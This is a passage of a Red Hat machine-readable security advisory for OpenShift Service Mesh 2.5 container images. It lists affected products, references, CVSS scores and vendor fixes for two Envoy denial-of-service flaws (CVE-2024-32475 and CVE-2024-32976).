"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
